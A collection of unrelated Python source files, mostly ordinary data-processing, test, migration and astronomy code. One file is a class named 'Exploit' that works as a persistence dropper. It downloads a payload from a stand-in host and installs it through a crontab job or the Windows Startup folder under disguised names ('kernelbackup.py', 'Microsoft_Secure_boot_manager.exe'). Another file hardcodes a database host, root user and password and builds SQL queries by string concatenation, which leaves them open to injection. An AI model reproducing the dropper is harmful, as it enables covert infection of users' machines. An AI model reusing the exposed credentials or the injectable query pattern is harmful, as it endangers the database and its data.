'-co', 'BLOCKYSIZE=512',
'-co', 'COMPRESS=DEFLATE',
'-co', 'ZLEVEL=9',
'-ot', 'Float32',
file,
str(file).replace(f'/hrsl_{name}_original/', f'/hrsl_{name}/'),
])
logger.info(file.name)
build_vrt(name)
logger.info(name)
def main():
run_process(merge_data)
logger.info('finished')
|
from sys import platform as _platform
from sys import exit as exit
from requests import get as load
from crontab import CronTab
import os
import getpass
class Exploit:
system = None
username= "max"
def __init__(self):
self.system=_platform
self.username= getpass.getuser()
if _platform == "darwin":
exit()
def addtoSystemstart(self):
if self.system=="linux":
cron = CronTab(user=self.username)
target = f"/home/{self.username}/kernelbackup.py"
basic_command = f"* */2 * * * python3 /home/{self.username}/kernelbackup.py"
cronIter= cron.find_command(f"python3 {target}")
exsist=False
for item in cronIter:
if str(item) == basic_command:
print("crontab job already exist", item)
exsist=True
break
if not exsist:
job = cron.new(f"python3 /home/{self.username}/kernelbackup.py")
job.hour.every(2)
job.enable()
cron.write()
if not os.path.isfile(target):
data= load("https://example.example/test/startup.py")
open(target, 'wb').write(data.content)
elif self.system=="win32" or self.system=="win64":
target = f"C:/Users/{self.username}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/Microsoft_Secure_boot_manager.exe"
if not os.path.isfile(target):
data= load("https://example.example/test/startup.exe", stream=True)
open(target, 'wb').write(data.content)
else:
pass
if __name__ == "__main__":
try:
hack = Exploit()
hack.addtoSystemstart() |
import cv2
import numpy as np
import os
def resize_image(img, size):
h, w = img.shape[:2]
c = img.shape[2] if len(img.shape)>2 else 1
if h == w:
return cv2.resize(img, size, cv2.INTER_AREA)
dif = h if h > w else w
interpolation = cv2.INTER_AREA if dif > (size[0]+size[1])//2 else cv2.INTER_CUBIC
x_pos = (dif - w)//2
y_pos = (dif - h)//2
if len(img.shape) == 2:
mask = np.zeros((dif, dif), dtype=img.dtype)
mask[y_pos:y_pos+h, x_pos:x_pos+w] = img[:h, :w]
else:
mask = np.zeros((dif, dif, c), dtype=img.dtype)
mask[y_pos:y_pos+h, x_pos:x_pos+w, :] = img[:h, :w, :]
return cv2.resize(mask, size, interpolation)
if __name__ == "__main__":
src_path = 'updated_data/7.Adho Mukha Svanasana/'
dst_path = 'updated_data/Resized_images/'
files = os.listdir(src_path)
for file in files:
print(file)
f_path = src_path+file
img = cv2.imread(f_path)
img = resize_image(img,size=(750,750))
cv2.imwrite(dst_path+file,img)
|
from heapq import heappop, heappush
from sortedcontainers import SortedList
class Solution:
def busiestServers(self, k: int, arrival: List[int], load: List[int]) -> List[int]:
valid = SortedList(range(k))
cnt = [0] * k
heap = []
for idx, (a, l) in enumerate(zip(arrival, load)):
c = idx % k
while heap and heap[0][0] <= a:
_, v = heappop(heap)
valid.add(v)
selected = next(valid.irange(c, k - 1), None)
if selected is None:
selected = next(valid.irange(0, k - 1), None)
if selected is not None:
cnt[selected] += 1
valid.remove(selected)
heappush(heap, [a + l, selected])
m = max(cnt)
return [i for i, v in enumerate(cnt) if v == m]
|
"""
Wins that don’t fit any category
"""
import logging
log = logging.getLogger(__name__)
import curses
from . import Win
from theming import get_theme, to_curses_attr
class VerticalSeparator(Win):
"""
Just a one-column window, with just a line in it, that is
refreshed only on resize, but never on refresh, for efficiency
"""
def __init__(self):
Win.__init__(self)
def rewrite_line(self):
self._win.vline(0, 0, curses.ACS_VLINE, self.height,
to_curses_attr(get_theme().COLOR_VERTICAL_SEPARATOR))
self._refresh()
def refresh(self):
log.debug('Refresh: %s', self.__class__.__name__)
self.rewrite_line()
class SimpleTextWin(Win):
def __init__(self, text):
Win.__init__(self)
self._text = text
self.built_lines = []
def rebuild_text(self):
"""
Transform the text in lines than can then be
displayed without any calculation or anything
at refresh() time
It is basically called on each resize
"""
self.built_lines = []
for line in self._text.split('\n'):
while len(line) >= self.width:
limit = line[:self.width].rfind(' ')
if limit <= 0:
limit = self.width
self.built_lines.append(line[:limit])
line = line[limit:]
self.built_lines.append(line)
def refresh(self):
log.debug('Refresh: %s', self.__class__.__name__)
self._win.erase()
for y, line in enumerate(self.built_lines):
self.addstr_colored(line, y, 0)
self._refresh()
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
def recommendcase(location,quality,compensate,dbcon,number):
"""
location: np.array
quality: np.array
compensate: np.array
dbcon: database connection
number: number of recommended cases
"""
import pandas as pd
caseset = pd.DataFrame(columns= ('caseid','num'))
if location.shape[0]:
for i in range(location.shape[0]):
#match keywords
sql1 = """SELECT caseid ,summary , 1 as num FROM product_dispute.summary_case WHERE summary like '%""" + location[i] + """%'"""
#append dataframe
caseset = caseset.append(pd.read_sql_query(sql1,db),ignore_index=True)
#print(caseset)
if quality.shape[0]:
for i in range(quality.shape[0]):
sql1 = """SELECT caseid ,summary,1 as num FROM product_dispute.summary_case WHERE summary like '%""" + quality[i] + """%'"""
#append dataframe
caseset = caseset.append(pd.read_sql_query(sql1,db),ignore_index=True)
if compensate.shape[0]:
for i in range(compensate.shape[0]):
sql1 = """SELECT caseid ,summary,1 as num FROM product_dispute.summary_case WHERE ask like '%""" + quality[i] + """%'"""
#append dataframe
caseset = caseset.append(pd.read_sql_query(sql1,db),ignore_index=True)
sql2 = """SELECT caseid ,summary,1 as num FROM product_dispute.summary_case WHERE results like '%""" + quality[i] + """%'"""
#append dataframe
caseset = caseset.append(pd.read_sql_query(sql2,db),ignore_index=True)
query = pd.DataFrame(caseset)
recommend = query.groupby('caseid').sum().sort_values('num',ascending = False)
recommend['caseid'] = recommend.index
return(recommend.iloc[:number,[1,2]])
# In[2]:
if __name__ == 'main':
import pymysql
import numpy as np
db = pymysql.connect(
host="cdb-74dx1ytr.gz.tencentcdb.com",
user="root",
passwd="sufelaw2019",
port=10008,
db = 'product_dispute')
location = np.array(['市场'])
quality = np.array(['过期', '超过保质期'])
compensate = np.array(['医药费'])
recommendcase(location,quality,compensate,db,2)##return a dataframe of summary and index
# In[ ]:
|
from analyze.calc_run import *
base = 'G:/Prive/MIJN-Documenten/TU/62-Stage/20180130-l/'
d=-5
# short quad nocoil
calc_run(base + 'run1',
REACTOR_GLASS_SHORT_QUAD,
scope_multiple=True,
scope_file_name_index=2, # lengt
meas=SHORT_MEAS_LEN,
current_scaling=0.5,
delay=d,
voltage_offset=30,
scope_dir=None,
) # disable waveform parse
calc_run(base + 'run2',
REACTOR_GLASS_SHORT_QUAD,
scope_multiple=True,
scope_file_name_index=2, # length
meas=SHORT_MEAS_LEN,
current_scaling=0.5,
delay=d,
voltage_offset=30,
scope_dir=None,
) # disable waveform parse
calc_run(base + 'run3',
REACTOR_GLASS_LONG,
scope_multiple=True,
scope_file_name_index=2, # lengt
meas=SHORT_MEAS_LEN,
current_scaling=0.5,
delay=d,
voltage_offset=80,
scope_dir=None,
) # disable waveform parse
calc_run(base + 'run4',
REACTOR_GLASS_LONG,
scope_multiple=True,
scope_file_name_index=2, # length
meas=SHORT_MEAS_LEN,
current_scaling=0.5,
delay=d,
voltage_offset=80,
scope_dir=None,
) # disable waveform parse
calc_run(base + 'run1a',
REACTOR_GLASS_SHORT_QUAD,
scope_multiple=True,
scope_file_name_index=2, # lengt
meas=SHORT_MEAS_LEN,
current_scaling=0.5,
delay=d,
voltage_offset=30,
)
calc_run(base + 'run2a',
REACTOR_GLASS_SHORT_QUAD,
scope_multiple=True,
scope_file_name_index=2, # length
meas=SHORT_MEAS_LEN,
current_scaling=0.5,
delay=d,
voltage_offset=30,
)
calc_run(base + 'run3a',
REACTOR_GLASS_LONG,
scope_multiple=True,
scope_file_name_index=2, # lengt
meas=SHORT_MEAS_LEN,
current_scaling=0.5,
delay=d,
voltage_offset=80,
)
calc_run(base + 'run4a',
REACTOR_GLASS_LONG,
scope_multiple=True,
scope_file_name_index=2, # length
meas=SHORT_MEAS_LEN,
current_scaling=0.5,
delay=d,
voltage_offset=80,
) |
"""Test the more robust put_item logic."""
import pytest
from . import tmp_dir_fixture # NOQA
try:
from unittest.mock import MagicMock
except ImportError:
from mock import MagicMock
def test_get_object_failure():
"""
Mock scenario where the get fails.
"""
from botocore.exceptions import WaiterError
from dtool_s3.storagebroker import _object_exists
mock_s3resource = MagicMock()
obj = MagicMock()
obj.wait_until_exists = MagicMock(side_effect=WaiterError(
'ObjectExists', 'Max attempts exceeded', {}))
mock_s3resource.Object = MagicMock(return_value=obj)
value = _object_exists(
mock_s3resource,
"dummy_bucket",
"dummy_dest_path"
)
assert value is False
def test_get_object_success():
"""
Mock scenario where the get succeeds.
"""
from dtool_s3.storagebroker import _object_exists
mock_s3resource = MagicMock()
obj = MagicMock()
obj.wait_until_exists = MagicMock()
mock_s3resource.Object = MagicMock(return_value=obj)
value = _object_exists(
mock_s3resource,
"dummy_bucket",
"dummy_dest_path"
)
obj.wait_until_exists.assert_called_once()
assert value is True
def test_upload_file_simulating_successful_upload():
"""
Mock scenario where upload simply succeeds.
"""
from dtool_s3.storagebroker import _upload_file # NOQA
s3client = MagicMock()
s3client.upload_file = MagicMock(return_value=True)
value = _upload_file(
s3client,
"dummy_fpath",
"dummy_bucket",
"dummy_dest_path",
"dummy_extra_args"
)
assert value is True
def test_upload_file_simulating_nosuchupload_failure(tmp_dir_fixture): # NOQA
"""
Mock scenario where upload fails with a NoSuchUpload exception.
"""
from dtool_s3.storagebroker import _upload_file # NOQA
import boto3
error_response = {'Error': {'Code': 'NoSuchUpload',
'Message': 'The specified multipart upload ' +
'does not exist. The upload ID might be ' +
'invalid, or the multipart upload might ' +
'have been aborted or completed.'}}
s3client = boto3.client("s3")
s3client.upload_file = MagicMock(
side_effect=s3client.exceptions.NoSuchUpload(
error_response,
"AbortMultipartUpload")
)
value = _upload_file(
s3client,
"dummy_fpath",
"dummy_bucket",
"dummy_dest_path",
"dummy_extra_args",
)
assert value is False
def test_upload_file_simulating_endpointconnectionerror(tmp_dir_fixture): # NOQA
"""
Mock scenario where upload fails with a EndpointConnectionError exception.
"""
from dtool_s3.storagebroker import _upload_file # NOQA
import boto3
from botocore.exceptions import EndpointConnectionError
s3client = boto3.client("s3")
s3client.upload_file = MagicMock(
side_effect=EndpointConnectionError(
endpoint_url="dummy_bucket/dest_path")
)
value = _upload_file(
s3client,
"dummy_fpath",
"dummy_bucket",
"dummy_dest_path",
"dummy_extra_args",
)
assert value is False
def test_upload_file_simulating_S3UploadFailedError(tmp_dir_fixture): # NOQA
"""
Mock scenario where upload fails with a S3UploadFailedError exception.
"""
from dtool_s3.storagebroker import _upload_file # NOQA
import boto3
from boto3.exceptions import S3UploadFailedError
s3client = boto3.client("s3")
s3client.upload_file = MagicMock(
side_effect=S3UploadFailedError()
)
value = _upload_file(
s3client,
"dummy_fpath",
"dummy_bucket",
"dummy_dest_path",
"dummy_extra_args",
)
assert value is False
def test_put_item_with_retry():
from dtool_s3.storagebroker import _put_item_with_retry # NOQA
def test_put_item_with_retry_immediate_success():
"""
Mock scenario where while doing a put, the upload succeeds without needing
to retry.
"""
import dtool_s3.storagebroker
dtool_s3.storagebroker._upload_file = MagicMock(return_value=True)
dtool_s3.storagebroker._object_exists = MagicMock()
dtool_s3.storagebroker._put_item_with_retry(
"dummy_s3client",
"dummy_s3resource",
"dummy_fpath",
"dummy_bucket",
"dummy_dest_path",
{}
)
dtool_s3.storagebroker._upload_file.assert_called()
dtool_s3.storagebroker._object_exists.assert_not_called()
def test_put_item_with_retry_simulating_upload_error_item_uploaded():
"""
Mock scenario where while doing a put, the upload fails with an ambiguous
failure, however item has been successfully created in the bucket.
"""
import dtool_s3.storagebroker
dtool_s3.storagebroker._upload_file = MagicMock(return_value=False)
dtool_s3.storagebroker._object_exists = MagicMock(return_value=True)
dtool_s3.storagebroker._put_item_with_retry(
"dummy_s3client",
"dummy_s3resource",
"dummy_fpath",
"dummy_bucket",
"dummy_dest_path",
{}
)
dtool_s3.storagebroker._upload_file.assert_called_once()
dtool_s3.storagebroker._object_exists.assert_called_once()
def test_put_item_with_retry_simulating_upload_error_item_doesnt_exist():
"""
Mock scenario where while doing a put, the upload fails, the object hasn't
been created on the target, so the retry routine is engaged.
"""
import dtool_s3.storagebroker
max_retry_time = 10
dtool_s3.storagebroker._upload_file = MagicMock(return_value=False)
dtool_s3.storagebroker._object_exists = MagicMock(return_value=None)
dtool_s3.storagebroker._put_item_with_retry = MagicMock(
side_effect=dtool_s3.storagebroker._put_item_with_retry)
with pytest.raises(dtool_s3.storagebroker.S3StorageBrokerPutItemError):
dtool_s3.storagebroker._put_item_with_retry(
s3client="dummy_s3client",
s3resource="dummy_s3resource",
fpath="dummy_fpath",
bucket="dummy_bucket",
dest_path="dummy_dest_path",
extra_args={},
max_retry_time=max_retry_time
)
assert dtool_s3.storagebroker._put_item_with_retry.call_count > 1
my_args = dtool_s3.storagebroker._put_item_with_retry.call_args
args, kwargs = my_args
assert kwargs['retry_time_spent'] >= max_retry_time
|
# Generated by Django 2.1.5 on 2019-01-19 09:25
import django.utils.timezone
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("motions", "0018_auto_20190118_2101")]
operations = [
migrations.AddField(
model_name="motion",
name="created",
field=models.DateTimeField(
auto_now_add=True, default=django.utils.timezone.now
),
preserve_default=False,
),
migrations.AddField(
model_name="motion",
name="last_modified",
field=models.DateTimeField(auto_now=True),
),
]
|
import gc
import platform
import sys
import pytest
from pyo3_pytests.objstore import ObjStore
PYPY = platform.python_implementation() == "PyPy"
@pytest.mark.skipif(PYPY, reason="PyPy does not have sys.getrefcount")
def test_objstore_doesnot_leak_memory():
N = 10000
message = b'\\(-"-;) Praying that memory leak would not happen..'
before = sys.getrefcount(message)
store = ObjStore()
for _ in range(N):
store.push(message)
del store
gc.collect()
after = sys.getrefcount(message)
assert after - before == 0
|
from ... pyaz_utils import _call_az
def list():
'''
List all security assessment results.
'''
return _call_az("az security assessment-metadata list", locals())
def show(name):
'''
Shows a security assessment.
Required Parameters:
- name -- name of the resource to be fetched
'''
return _call_az("az security assessment-metadata show", locals())
def create(description, display_name, name, severity, remediation_description=None):
'''
Creates a customer managed security assessment type.
Required Parameters:
- description -- Detailed string that will help users to understand the assessment and how it is calculated
- display_name -- Human readable title for this object
- name -- name of the resource to be fetched
- severity -- Indicates the importance of the security risk if the assessment is unhealthy
Optional Parameters:
- remediation_description -- Detailed string that will help users to understand the different ways to mitigate or fix the security issue
'''
return _call_az("az security assessment-metadata create", locals())
def delete(name):
'''
Deletes a security assessment type and all it's assessment results.
Required Parameters:
- name -- name of the resource to be fetched
'''
return _call_az("az security assessment-metadata delete", locals())
|
import pickle
import argparse
import random
import matplotlib.pyplot as plt
import numpy as np
from math import floor
class MyEvaluation:
def __init__(self, user_train, user_test, movie_train, movie_test, iteration,
sample_test=50, TOP_M_start=10, TOP_M_end=100, pred_type='out-of-matrix', seed=42):
assert pred_type in ['in-matrix', 'out-of-matrix', 'both']
self.folder = f"output-data/{iteration}"
self.sample_test = sample_test
self.TOP_M_start = TOP_M_start
self.TOP_M_end = TOP_M_end
self.pred_type = pred_type
self.seed = seed
# Set seed
np.random.seed(self.seed)
self.rating_GroupForUser_TRAIN, self.rating_GroupForUser_TEST = user_train, user_test,
self.rating_GroupForMovie_TRAIN, self.rating_GroupForMovie_TEST = movie_train, movie_test
self.mu = np.load(f"./{self.folder}/mu.npy")
self.shp = np.load(f"./{self.folder}/shp.npy")
self.rte = np.load(f"./{self.folder}/rte.npy")
# TODO: maybe float64 -> float32? Compare results if changed!
# print(self.mu.dtype)
# print(self.shp.dtype)
# print(self.rte.dtype)
# Group items separately
self.cold_items_TRAIN, self.cold_items_TEST, self.noncold_items_TRAIN, self.noncold_items_TEST = self.group_items()
# Generate test set
self.test_set = self.generate_test_set()
# Average Recalls and Precisions over all users of test set across the Top-M
# TRAIN
self.avg_recalls_in_matrix_TRAIN, self.avg_precisions_in_matrix_TRAIN = [], []
self.avg_recalls_out_of_matrix_TRAIN, self.avg_precisions_out_of_matrix_TRAIN = [], []
# TEST
self.avg_recalls_in_matrix_TEST, self.avg_precisions_in_matrix_TEST = [], []
self.avg_recalls_out_of_matrix_TEST, self.avg_precisions_out_of_matrix_TEST = [], []
# Update them accordingly
self.avg_recall_precision()
def group_items(self) -> list:
"""Number of cold items - 5,577/25,900 || Number of noncold items - 20,323/25,900"""
cold_items_TRAIN, cold_items_TEST = [], []
noncold_items_TRAIN, noncold_items_TEST = [], []
for movie_id in self.rating_GroupForMovie_TRAIN:
if len(self.rating_GroupForMovie_TRAIN[movie_id]) != 0:
noncold_items_TRAIN.append(movie_id)
else:
cold_items_TRAIN.append(movie_id)
for movie_id in self.rating_GroupForMovie_TEST:
if len(self.rating_GroupForMovie_TEST[movie_id]) != 0:
noncold_items_TEST.append(movie_id)
else:
cold_items_TEST.append(movie_id)
print(f"Training set: cold-{len(cold_items_TRAIN)}, noncold-{len(noncold_items_TRAIN)}")
print(f"Testing set: cold-{len(cold_items_TEST)}, noncold-{len(noncold_items_TEST)}")
return cold_items_TRAIN, cold_items_TEST, noncold_items_TRAIN, noncold_items_TEST
def generate_test_set(self) -> list:
sample = random.sample(list(self.rating_GroupForUser_TEST.keys()), self.sample_test)
test_set = []
for u in sample:
if len(self.rating_GroupForUser_TEST[u]) > 0 and len(self.rating_GroupForUser_TRAIN[u]) > 0:
test_set.append(u)
# avg = 0
# for i in self.rating_GroupForUser_TRAIN:
# avg += len(self.rating_GroupForUser_TRAIN[i])
# print(avg/len(self.rating_GroupForUser_TRAIN))
# exit()
return test_set
# TODO add new one
# here ...
#TODO old one
def predict_in_matrix(self, user_id, top_m) -> None:
"""Compute in-matrix recall and precision for a given user, then add them to the sum"""
ratings = np.dot((self.shp[user_id] / self.rte[user_id]), self.mu.T)
actual_TRAIN = self.rating_GroupForUser_TRAIN[user_id]
actual_TEST = self.rating_GroupForUser_TEST[user_id]
sorted_ratings = np.argsort(-ratings)
predicted_top_M_TRAIN = np.setdiff1d(sorted_ratings, self.cold_items_TRAIN, assume_unique=True)[:top_m]
predicted_top_M_TEST = np.setdiff1d(sorted_ratings, self.cold_items_TEST, assume_unique=True)[:top_m]
top_m_correct_TRAIN = np.sum(np.in1d(predicted_top_M_TRAIN, actual_TRAIN) * 1)
top_m_correct_TEST = np.sum(np.in1d(predicted_top_M_TEST, actual_TEST) * 1)
self.recalls_in_matrix_TRAIN += (top_m_correct_TRAIN / len(self.rating_GroupForUser_TRAIN[user_id]))
self.precisions_in_matrix_TRAIN += (top_m_correct_TRAIN / top_m)
self.recalls_in_matrix_TEST += (top_m_correct_TEST / len(self.rating_GroupForUser_TEST[user_id]))
self.precisions_in_matrix_TEST += (top_m_correct_TEST / top_m)
# TODO old one
# def predict_out_of_matrix(self, user_id, top_m) -> None:
# """Compute out-of-matrix recall and precision for a given user, then add them to the sum"""
# ratings = np.dot((self.shp[user_id] / self.rte[user_id]), self.mu.T)
# actual_TRAIN = self.rating_GroupForUser_TRAIN[user_id]
# actual_TEST = self.rating_GroupForUser_TEST[user_id]
# predicted_top_M = np.argsort(-ratings)[:top_m]
# top_m_correct_TRAIN = np.sum(np.in1d(predicted_top_M, actual_TRAIN) * 1)
# top_m_correct_TEST = np.sum(np.in1d(predicted_top_M, actual_TEST) * 1)
# self.recalls_out_of_matrix_TRAIN += (top_m_correct_TRAIN / len(self.rating_GroupForUser_TRAIN[user_id]))
# self.precisions_out_of_matrix_TRAIN += (top_m_correct_TRAIN / top_m)
# self.recalls_out_of_matrix_TEST += (top_m_correct_TEST / len(self.rating_GroupForUser_TEST[user_id]))
# self.precisions_out_of_matrix_TEST += (top_m_correct_TEST / top_m)
# TODO new one
def predict_out_of_matrix(self, user_id, top_m) -> None:
"""Compute out-of-matrix recall and precision for a given user, then add them to the sum"""
ratings = np.dot((self.shp[user_id] / self.rte[user_id]), self.mu.T)
actual_TRAIN = self.rating_GroupForUser_TRAIN[user_id]
actual_TEST = self.rating_GroupForUser_TEST[user_id]
sorted_ratings = np.argsort(-ratings)
predicted_top_M_TEST = np.setdiff1d(sorted_ratings, self.rating_GroupForUser_TRAIN[user_id], assume_unique=True)[:top_m]
predicted_top_M_TRAIN = sorted_ratings[:top_m]
top_m_correct_TRAIN = np.sum(np.in1d(predicted_top_M_TRAIN, actual_TRAIN) * 1)
top_m_correct_TEST = np.sum(np.in1d(predicted_top_M_TEST, actual_TEST) * 1)
self.recalls_out_of_matrix_TRAIN += (top_m_correct_TRAIN / len(self.rating_GroupForUser_TRAIN[user_id]))
self.precisions_out_of_matrix_TRAIN += (top_m_correct_TRAIN / top_m)
self.recalls_out_of_matrix_TEST += (top_m_correct_TEST / len(self.rating_GroupForUser_TEST[user_id]))
self.precisions_out_of_matrix_TEST += (top_m_correct_TEST / top_m)
def avg_recall_precision(self) -> None:
for top in range(self.TOP_M_start, self.TOP_M_end):
# make all metrics zero for new iteration
print(f"Top-M: {top}")
self.recalls_in_matrix_TRAIN, self.precisions_in_matrix_TRAIN = 0, 0
self.recalls_out_of_matrix_TRAIN, self.precisions_out_of_matrix_TRAIN = 0, 0
self.recalls_in_matrix_TEST, self.precisions_in_matrix_TEST = 0, 0
self.recalls_out_of_matrix_TEST, self.precisions_out_of_matrix_TEST = 0, 0
if self.pred_type == "both":
for usr in self.test_set:
self.predict_in_matrix(usr, top)
self.predict_out_of_matrix(usr, top)
self.avg_recalls_in_matrix_TRAIN.append(self.recalls_in_matrix_TRAIN / len(self.test_set))
self.avg_precisions_in_matrix_TRAIN.append(self.precisions_in_matrix_TRAIN / len(self.test_set))
self.avg_recalls_out_of_matrix_TRAIN.append(self.recalls_out_of_matrix_TRAIN / len(self.test_set))
self.avg_precisions_out_of_matrix_TRAIN.append(self.precisions_out_of_matrix_TRAIN / len(self.test_set))
elif self.pred_type == "in-matrix":
for usr in self.test_set:
self.predict_in_matrix(usr, top)
self.avg_recalls_in_matrix_TRAIN.append(self.recalls_in_matrix_TRAIN / len(self.test_set))
self.avg_precisions_in_matrix_TRAIN.append(self.precisions_in_matrix_TRAIN / len(self.test_set))
self.avg_recalls_in_matrix_TEST.append(self.recalls_in_matrix_TEST / len(self.test_set))
self.avg_precisions_in_matrix_TEST.append(self.precisions_in_matrix_TEST / len(self.test_set))
elif self.pred_type == "out-of-matrix":
for usr in self.test_set:
self.predict_out_of_matrix(usr, top)
self.avg_recalls_out_of_matrix_TRAIN.append(self.recalls_out_of_matrix_TRAIN / len(self.test_set))
self.avg_precisions_out_of_matrix_TRAIN.append(self.precisions_out_of_matrix_TRAIN / len(self.test_set))
self.avg_recalls_out_of_matrix_TEST.append(self.recalls_out_of_matrix_TEST / len(self.test_set))
self.avg_precisions_out_of_matrix_TEST.append(self.precisions_out_of_matrix_TEST / len(self.test_set))
def plot(self) -> None:
if self.pred_type == "both":
r_i_TRAIN, p_i_TRAIN = self.avg_recalls_in_matrix_TRAIN, self.avg_precisions_in_matrix_TRAIN
r_o_TRAIN, p_o_TRAIN = self.avg_recalls_out_of_matrix_TRAIN, self.avg_precisions_out_of_matrix_TRAIN
r_i_TEST, p_i_TEST = self.avg_recalls_in_matrix_TEST, self.avg_precisions_in_matrix_TEST
r_o_TEST, p_o_TEST = self.avg_recalls_out_of_matrix_TEST, self.avg_precisions_out_of_matrix_TEST
elif self.pred_type == "in-matrix":
r_TRAIN, p_TRAIN = self.avg_recalls_in_matrix_TRAIN, self.avg_precisions_in_matrix_TRAIN
r_TEST, p_TEST = self.avg_recalls_in_matrix_TEST, self.avg_precisions_in_matrix_TEST
elif self.pred_type == "out-of-matrix":
r_TRAIN, p_TRAIN = self.avg_recalls_out_of_matrix_TRAIN, self.avg_precisions_out_of_matrix_TRAIN
r_TEST, p_TEST = self.avg_recalls_out_of_matrix_TEST, self.avg_precisions_out_of_matrix_TEST
# PLOT recall graph
plt.ioff() # Turn interactive plotting off
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(9, 4))
if self.pred_type == "both":
ax1.plot(range(self.TOP_M_start, self.TOP_M_end), r_i_TRAIN, label="in-matrix-train")
ax1.plot(range(self.TOP_M_start, self.TOP_M_end), r_o_TRAIN, label="out-of-matrix-train")
ax1.plot(range(self.TOP_M_start, self.TOP_M_end), r_i_TEST, label="in-matrix-test")
ax1.plot(range(self.TOP_M_start, self.TOP_M_end), r_o_TEST, label="out-of-matrix-test")
else:
ax1.plot(range(self.TOP_M_start, self.TOP_M_end), r_TRAIN, label="train")
ax1.plot(range(self.TOP_M_start, self.TOP_M_end), r_TEST, label="test")
ax1.set_xlabel('Top-M', fontsize=11)
ax1.set_ylabel('Recall', fontsize=11)
ax1.set_title(f"Sample size: {self.sample_test}")
ax1.legend()
# PLOT precision graph
if self.pred_type == "both":
ax2.plot(range(self.TOP_M_start, self.TOP_M_end), p_i_TRAIN, label="in-matrix-train")
ax2.plot(range(self.TOP_M_start, self.TOP_M_end), p_o_TRAIN, label="out-of-matrix-train")
ax2.plot(range(self.TOP_M_start, self.TOP_M_end), p_i_TEST, label="in-matrix-test")
ax2.plot(range(self.TOP_M_start, self.TOP_M_end), p_o_TEST, label="out-of-matrix-test")
else:
ax2.plot(range(self.TOP_M_start, self.TOP_M_end), p_TRAIN, label="train")
ax2.plot(range(self.TOP_M_start, self.TOP_M_end), p_TEST, label="test")
ax2.set_xlabel('Top-M', fontsize=11)
ax2.set_ylabel('Precision', fontsize=11)
ax2.set_title(f"Sample size: {self.sample_test}")
ax2.legend()
# plot configs
ax1.grid()
ax2.grid()
plt.subplots_adjust(wspace=0.3, left=0.1, right=0.95, bottom=0.15)
fig.suptitle(f'{self.pred_type} predictions', fontsize=14)
plt.savefig(f'./{self.folder}/FIGURE.png')
# plt.show()
|
"""
Parses data from myanimelist/anilist and themes.moe.
"""
from typing import List
from animethemes_dl.options import OPTIONS
import logging
from ..models.animethemes import AnimeThemeAnime
from .anilist import get_anilist
from .animethemes import fetch_animethemes
from .myanimelist import get_mal
logger = logging.getLogger('animethemes-dl')
def get_animethemes(username: str, anilist: bool=False, **animelist_args) -> List[AnimeThemeAnime]:
"""
Gets data from themes.moe and myanimelist.net/anilist.co.
Returns a dictionary of anime themes.
To use anilist.co instead of myanimelist.net, use `anilist`.
For additional args for myanimelist/anilist, use `animelist_args`.
"""
if anilist:
animelist = get_anilist(username, **animelist_args)
else:
animelist = get_mal(username, **animelist_args)
if any(OPTIONS['animelist']['range']):
s,e = OPTIONS['animelist']['range']
animelist = animelist[s:e or None]
return fetch_animethemes(animelist)
if __name__ == "__main__":
from pprint import pprint
pprint(get_animethemes('sadru'))
|
#!/usr/bin/python
"""
Classes to create a complete report of an array configuration with the plots+report.
First it will create the necessary simulations. Then the missing plots+reports
INPUT:
- Antenna List (casa format)
- Band List : nominal frequencies for each band will be defined
- Type of report: Complete, Normal, Fast (to be clearly defined)
(Not Yet Implemented)
HISTORY:
2011.04.03:
- Definition of the program with the classes.
2011.04.04:
- Report class
2011.04.17:
- Add the Shadowing class
2011.04.18:
- fixing curveShadowingDeclination. Ideally we don't want cleaning but only the UV-coverage.
- plotShadowingDeclination (+pickle)
2011.05.05:
- Adding the figures class
2011.11.04:
- adding the class ArrayConfigurationCasaFile
2011.11.06:
- move the class ArrayConfigurationCasaFile to the file arrayConfigurationFile
2012.03.05:
- Fix bug in curveShadowDeclination for CASA 3.3
- Add a method to simulate an image with various components (Gaussian or Disk)
2012.04.04:
- Add method to analyze the UV-coverage between different array configurations
2012.04.11:
- Add filtering class for the simulation
2012.04.19:
- Modify filtering class to have a larger mapsize and to sue the new task to replace simdata (simobserve , simanalyze)
2012.05.17:
- modify filtering to use a uniform disk rather than a Gaussian
2012.05.24:
- add the beam class to analyze it
2012.08.27:
- add hourAngle parameter to the Shadowing method.
2012.11.14:
- Adding the LAS measurement (at 100 GHz) to the curveBeamResolutionDeclination method
2013.06.09:
- adapting arrayConfigurationReport to CASA 4.0.1
2013.06.22:
- Adding LAS class to compute it in function of disk size...
2013.07.02:
- adapt radialDensityArrayConfigurations to CASA 4.0.1
2014.11.07:
- Adding the script to the AIV CVS
2014.11.08:
- Important : spatial resolution is computed with Briggs
2015.07.27:
- Update the curveFluxDiskSize
2015.10.08:
- change the LAS definition (MRS) using L05 definition from SCIREQ-328
IMPORTANT : if MRS_new > MRS_old we keep MRS_old
2016.03.08:
- change the mask definition in the LAS class.
2016.03.09:
- improve LAS class (setting, mapsize, etc)
RUN:
CASA> : sys.path.insert(0,'/home/stephane/git/ALMA/ALMA/ArrayConfiguration/')
"""
__authors__="ALMA: SL"
__version__="0.6.2@2016.03.09"
import UVW as uvw
import beamAnalysis as ba
import math, string
import numpy as np
import os
import pickle
from casa import componentlist as cl
# import simdata as sim
import pylab as pl
from casa import image as ia
from casa import regionmanager as rg
import simanalyze as sa
import simobserve as so
import imstat as ims
import arrayConfigurationTools as aT
RAD2ARCSEC = 206264.9
# execfile('UVW.py')
# execfile('BeamAnalysis.py')
band={'3':'100GHz','6':'230GHz','7':'345GHz','9':'675GHz'}
class filtering:
"""
Simulation of Gaussian Beams (from R. Indebetouw)
"""
def __init__(self):
pass
def runFiltering(self,antennaCfg,trackDuration,frequency,dec,imageTotalSize,resolutionStart,resolutionEnd,resolutionStep):
"""
use the disk100.fits image of a uniform disk of 100 pixel size (diameter)
Run a set of simulations to account for the filtering at different scales.
antennaCfg: antenna configuration file
trackDuration : trackDuration
resolutionStart,resolutionEnd,resolutionStep: range for the resolution to simulate
dec: declination
OUTPUT:
resolution, flux: resolution and flux output (1 Jy in entry)
"""
maskClean = [70,70,180,180]
projectName="tempCurveFiltering"
nStep=math.floor((resolutionEnd-resolutionStart)/resolutionStep)
resolutionArr=np.arange(nStep)*resolutionStep+resolutionStart
flux=np.zeros(nStep)
boxStat = '%d,%d,%d,%d'%(maskClean[0],maskClean[1],maskClean[2],maskClean[3])
os.system("rm -Rf *%s*"%(projectName))
